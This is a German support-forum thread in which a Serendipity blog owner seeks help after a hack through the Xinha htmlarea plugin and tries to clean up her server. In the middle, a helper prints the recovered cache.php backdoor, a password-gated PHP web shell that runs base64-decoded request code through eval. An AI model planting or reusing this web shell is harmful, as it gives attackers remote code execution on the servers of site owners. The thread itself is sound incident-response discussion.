Merkwürdiger Anstieg von Aufrufen einer internen Datei

[Fiona59]

Hallo

Ich hatte neulich massive Probleme durch enorm viele Seitenaufrufe auf meinen Server. Jetzt versuche ich gerade zu klären, welche Seiten tatsächlich davon betroffen waren und stelle über die 1&1 Statistik fest: Am 4. häufigsten wurde diese URL aufgerufen (fast 47.000 Zugriffe im letzten Monat): blog.fiona.biz/htmlarea/plugins/ExtendedFileManager/demo_images/cache.php

Das ist einigermaßen erstaunlich, denn diese Seite wird im Browser nur weiß angezeigt und das Blog selbst gehört zu den weniger aktiven.

Was ist da los und muss ich was tun? Was?

Herzlichst
Fiona

[Timbalu]

Guten Morgen Fiona

Dein Blog wurde vermutlich gehackt. Und das über das 3dt Party Xinha Tool. Der Hacker hinterließ womöglich eine cache.php PHP Datei, die dort nichts zu suchen hat und die nun ständig aufgerufen wird. Interessant wäre ja zu wissen, wer diese Datei so oft aufruft und was diese Datei eigentlich macht. Du könntest sie mir mal schicken, per PN.
Allerdings hattest du doch schon mal das Problem ... http://board.s9y.org/viewtopic.php?f=10 ... #p10422099 ?? Was ist diesmal anders?
Möglicherweise hast du einfach nicht eindeutig genug nach kompromierten Dateien gesucht und diese auch gelöscht.
Bitte lese die Announcements hier im Forum, die Mitteilung im Serendipity Blog und suche mal nach "gehackt". Dort und in deren Kommentaren findet sich alles, wie man die bösen Geister los wird, sich eventuell absichert bzw die 1.5.5 Serendipity Version draufspielt.

[Fiona59]

Hallo

Meines Wissen läuft die aktuelle Blogversion auf diesem Blog. 1.5.5. steht ganz unten. Die im anderen Thread genannten Maßnahmen hatte ich damals komplett durchgeführt und danach war auch Ruhe.

Bis jetzt. Bzw. bis heute das Blog nicht erreichbar war. Ich habe das schon auf den Umzug auf den neuen Server geschoben aber der Supporter sagte mir, es hätte in der index.php ein > Klammer gefehlt und die hätte er ersetzt und seither läuft das Blog wieder. Ich bin einigermaßen irritiert. Denn seit gestern habe ich selbst im Blog nichts geändert.

Herzlichst
Fiona

Nachtrag: Der alte Thread bezieht sich auf ein anderes Blog.
Nachtrag II: 1x1 sagt, man könne nicht herausfinden, wer von wo auf diese Datei zugreift. Bzw. dass die zuletzt registrierte IP höchst wahrscheinlich nicht zum Hacker führen würde. Wie dem auch sei: Die gesammelten Maßnamen von o.g. Thread habe ich jetzt auch in diesem Blog durchgeführt und dazu sämtliche Passwörter geändert. Jetzt kann ich nur noch abwarten, ob diese Datei wieder erscheint.

[Timbalu]

Bis jetzt. Bzw. bis heute das Blog nicht erreichbar war. Ich habe das schon auf den Umzug auf den neuen Server geschoben aber der Supporter sagte mir, es hätte in der index.php ein > Klammer gefehlt und die hätte er ersetzt und seither läuft das Blog wieder. Ich bin einigermaßen irritiert. Denn seit gestern habe ich selbst im Blog nichts geändert.

Es deutet aber durch den Ort der cache.php sehr auf den Xinha Bug hin. Der ist aber mit Serendipity 1.5.5 definitiv nicht mehr möglich. Also kann da irgendetwas nicht stimmen.

Wie gesagt, müssen alle beschreibbaren Teile deines Blogs nach eventuellen Hack-Dateien durchsucht werden. Auch das der index.php ein > fehlte, spricht nicht für die Zuverlässigkeit des Systems. Dies ist nicht der Auslieferungszustand eines Releases.

Du sprichst auch immer von Heute, dabei ist dein cache.php Problem schon eine unbearbeitete Woche alt. Kann es sein, dass wir von verschiedenen Situationen reden? Vielleicht musst du hier nochmal von vorn beginnen, damit die Probleme und auch die Lösung klarer werden.

Version XXX Upgrade auf XXX, Umzug von PHP XXX auf SERVER mit PHP XXX, etc. Beschreibung der aufgetretenen Fehlermeldungen oder blank Pages, sonstige Merwürdigkeiten, etc.

[Fiona59]

Hallo

du wirst mit deinem Hackangriff recht haben.

Im Ordner template_c sammeln sich plötzlich Ordner namens Cache_1 _3 _4 usw. an. Lösche ich sie, kommen sie wieder.

Habe den kompletten Ordner htmlarea gelöscht und anschließend Serendipity komplett neu drübergebügelt. Es ändert sich nichts.

Bemerkt habe ich den Angriff auf dieses Blog auch durch den Hinweis auf der Startseite, nach der eine Klammer fehlen würde.

Das Blog ist inzwischen wieder erreichbar aber anscheinend haben die Hacker irgendwo noch etwas vergraben. Bloß wo?

Herzlichst
Fiona

[garvinhicking]

Hi!

Erstelle eine Liste aller Dateien auf deinem Server, und gleiche sie ab mit den enthaltenen Dateien/Verzeichnisse in dem Serendipity-Paket.

Davon ziehst Du dann alle Dateien ab die Du wissentlich selber hochgeladen hast (vorzugsweise Dateien in uploads/) und z.b. per spartacus installierte Plugins.

Die Dateien die dann übrig bleiben kannst Du hier gerne mal posten, dann kann ich sagen was nicht dazu gehört.

Grüße,
Garvin

[Timbalu]

Hier mal der Inhalt der cache.php Datei, die es ja nun nicht mehr sein kann, denn der htmlarea Ordner wurde ja gelöscht und gesichert neu aufgespielt. Wichtig ist Garvins Vorschlag für einen genauen Abgleich aller Dateien.

Code: Select all

error_reporting(0);
@session_start();
if(md5($_REQUEST["p"])=="XXXXXc2429eaf3ca1f5c9605be722060" or  md5($_SESSION["p"])=="XXXXXc2429eaf3ca1f5c9605be722060" ){
	echo("[STARTDATA]");flush();
	if(md5($_REQUEST["p"])==XXXXXc2429eaf3ca1f5c9605be722060") {
	@$_SESSION["p"]=$_REQUEST["p"];
	@$_SESSION["c"]=$_REQUEST["code"];
	if(isset($_REQUEST["c"])){
		eval(base64_decode($_REQUEST["c"]));
		};
	}else{
		eval(base64_decode($_SESSION["c"]));
	}
	echo("[ENDDATA]");
}

Im Grunde nichts anderes als der code executor des Hackers.
Leider wird nicht deutlich, ob er wirklich noch anderes als GET benutzen kann, außer der Vermutung das die index.php und eventuell $_SESSION manipuliert wurde.

[Fiona59]

Hallo

Ich bin Ordner für Ordner durchgegangen und habe verglichen -> und keine weiteren fremden / anderen Dateien gefunden. Zur Sicherheit habe die Ordner für Ordner einzeln gelöscht und mit dem Original Serendipity 1.5.5 erneut ausgetauscht.

Dennoch werden inzwischen in zwei Blogs (auf dem gleichen Server) im Ordner template_c diverse Ordner angelegt.

blumenbilderblog/template_c/ -> cache_a bis cache_2 (angelegt am 24.5)
starkeworteblog/template_c/ -> cache_0 bis cache_1 (angelegt am 23.5. und 24.5)

Lösche ich diese Dateien und Ordner, sind sie kurze Zeit darauf wieder da. Hat irgendjemand eine Idee oder eine Erklärung dafür?

Herzlichst
Fiona

[garvinhicking]

Hi!

Es gibt bestimmt Plugins die derartige Dateien anlegen. Wie sehen jene cache_* Sachen aus? Auswendig weiß ich leider nicht welches der 200 Plugins das benutzt...

Viele Grüße,
Garvin

[Fiona59]

Hallo

In den Cache-Ordnern liegen Binärdateien. Beispielsweise so:

chache_f/cache_ff/cache_2ada3ca1ef7b36d9f1a856c7b012fef5_136ce0579c177c90a37f090af7039197

Herzlichst
Fiona

[Timbalu]

hast du immer noch häufig vorkommende Zugriffe auf irgendeine Datei, die damit eventuell in Verbindung stehen könnten? Vielleicht sind das die die temporären Überreste der Code-Injection?

[Fiona59]

Hallo

Momentan herrscht Ruhe. Lt. Webanalyse wurden übrigens diese beiden Dateien angesteuert:

/htmlarea/plugins/ExtendedFileManager/demo_images/aaa.php

/htmlarea/plugins/ExtendedFileManager/demo_images/cache.php

Beide gibt es nicht mehr.

Herzlichst
Fiona

[Timbalu]

Also das kommt einem doch sehr Spanisch vor.....
Es sieht aus als ob du eventuell wordpress, LifeType, PythonBlog oder ähnliches verwendest, in Kombination mit Serendipitys bzw Smartys template_c als tmp Ordner.

Beispiele aus dem Internet mit beeinhaltetem Pfad "/cache_f/cache_ff/"
http://anisaherbal.com/life/tmp/cache_f ... 9a6f75849b

a:4:{s:4:"text";s:112:"If you can read this post, it means that the registration process was successful and that you can start blogging";s:15:"normalized_text";s:112:"If you can read this post, it means that the registration process was successful and that you can start blogging";s:5:"topic";s:16:"Congratulations!";s:16:"normalized_topic";s:16:"Congratulations!";}

http://myfbblog.com/tmp/cache_f/cache_f ... b20de6f466

O:10:"Permission":10:{s:3:"_id";s:2:"56";s:5:"_name";s:14:"view_templates";s:12:"_description";s:19:"view_templates_desc";s:9:"_corePerm";s:1:"1";s:10:"_adminOnly";s:1:"1";s:6:"_class";s:8:"DbObject";s:7:"_fields";a:5:{s:10:"permission";s:7:"getName";s:11:"description";s:14:"getDescription";s:9:"core_perm";s:16:"isCorePermission";s:10:"admin_only";s:21:"isAdminOnlyPermission";s:2:"id";s:5:"getId";}s:11:"_properties";a:0:{}s:14:"unserializable";a:0:{}s:2:"pk";s:2:"id";}

[Fiona59]

Hallo

Nein, ich verwende ausschließlich Serendipity für meine Blogs. Das heißt, als Ghostbloggerin betexte (!) ich durchaus auch zwei Wordpress-Blogs aber miteinander verknüpft ist da nichts.

Herzlichst
Fiona

[Timbalu]

und was steht als serialized data in deiner Datei?
cache_f/cache_ff/cache_2ada3ca1ef7b36d9f1a856c7b012fef5_136ce0579c177c90a37f090af7039197